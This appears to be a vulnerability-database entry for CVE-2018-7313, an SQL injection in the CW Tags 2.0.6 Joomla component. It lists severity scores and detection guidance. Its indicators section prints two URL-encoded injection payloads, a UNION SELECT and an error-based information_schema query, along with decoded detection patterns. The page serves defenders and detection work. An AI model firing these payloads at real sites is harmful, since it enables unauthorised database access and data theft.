cbcvebase.
CVE-2018-7313
published 2018-02-22

CVE-2018-7313: SQL Injection exists in the CW Tags 2.0.6 component for Joomla! via the searchtext array parameter.

PriorityP273critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
20.17%
97.1th percentile
SQL Injection exists in the CW Tags 2.0.6 component for Joomla! via the searchtext array parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
cwjoomlacw_tags

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://localhost/[PATH]/index.php?option=com_cwtags&searchtext[]=[SQL]
command%2d%45%66%65%27%29%20%20%2f%2a%21%30%33%33%33%33%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%33%33%33%33%53%45%4c%45%43%54%2a%2f%20%40%40%48%4f%53%54%4e%41%4d%45%2d%2d%20%2d
command%31%27%61%6e%64%20%28%73%65%6c%65%63%74%20%31%20%66%72%6f%6d%20%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%2c%63%6f%6e%63%61%74%28%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%63%61%73%74%28%64%61%74%61%62%61%73%65%28%29%20%61%73%20%63%68%61%72%29%2c%30%78%37%65%29%29%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%77%68%65%72%65%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%64%61%74%61%62%61%73%65%28%29%20%6c%69%6d%69%74%20%30%2c%31%29%2c%66%6c%6f%6f%72%28%72%61%6e%64%28%30%29%2a%32%29%29%78%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%67%72%6f%75%70%20%62%79%20%78%29%61%29%20%41%4e%44%20%27%27%3d%27
  • Detect SQL injection attempts against the CW Tags Joomla component by monitoring HTTP requests containing the array-style parameter 'searchtext[]' with the query string 'option=com_cwtags'
  • The first payload (URL-decoded) injects: -Efe') /*!03333UNION*/ /*!03333SELECT*/ @@HOSTNAME-- - — look for inline comment obfuscation (/*!NNNNN...*/) combined with UNION SELECT in the searchtext[] parameter
  • The second payload (URL-decoded) performs a time/error-based blind SQLi enumerating information_schema.tables — alert on requests to index.php?option=com_cwtags where searchtext[] contains references to 'information_schema' or 'concat(cast(database()' patterns
  • ·The exploit PoC uses 'localhost' as the target host — replace with the actual target hostname/IP when operationalizing detection rules or scanning

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.